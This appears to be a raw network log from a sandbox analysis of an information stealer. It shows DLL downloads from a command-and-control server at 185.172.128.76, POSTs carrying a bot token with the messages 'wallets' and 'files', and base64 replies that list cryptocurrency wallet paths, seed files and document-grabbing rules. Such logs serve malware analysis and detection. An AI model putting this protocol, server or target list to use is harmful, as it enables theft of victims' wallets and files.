6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Apr 26, 2024 17:11:35.907382965 CEST	94	OUT	GET /15f649199f40275b/softokn3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 17:11:36.267007113 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:36 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Apr 26, 2024 17:11:37.332884073 CEST	98	OUT	GET /15f649199f40275b/vcruntime140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 17:11:37.679658890 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:37 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Apr 26, 2024 17:11:40.428231955 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHI Host: 185.172.128.76 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:40.805490017 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:44.604397058 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"wallets------JJJKFBAAAFHJEBFIEGID--
Apr 26, 2024 17:11:44.960058928 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 4d 58 78 63 56 32 46 73 62 47 56 30 56 32 46 7a 59 57 4a 70 58 45 4e 73 61 57 56 75 64 46 78 58 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 6d 70 7a 62 32 35 38 4d 48 78 46 64 47 68 6c 63 6d 56 31 62 58 77 78 66 46 78 46 64 47 68 6c 63 6d 56 31 62 56 78 38 61 32 56 35 63 33 52 76 63 6d 56 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 58 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 53 31 4d 56 45 4e 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 38 5a 58 68 76 5a 48 56 7a 4c 6d 4e 76 62 6d 59 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 38 4d 58 78 63 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 63 66 48 42 68 63 33 4e 77 61 48 4a 68 63 32 55 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 58 48 78 7a 5a 57 56 6b 4c 6e 4e 6c 59 32 39 38 4d 48 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 48 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 77 78 66 46 78 46 62 47 56 6a 64 48 4a 76 62 6b 4e 68 63 32 68 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 54 58 56 73 64 47 6c 45 62 32 64 6c 66 44 46 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49 Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsI
Apr 26, 2024 17:11:45.021163940 CEST	466	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAA Host: 185.172.128.76 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="message"files------GHDHJEBFBFHJECAKFCAA--
Apr 26, 2024 17:11:45.374330044 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 31 47 53 Data Ascii: 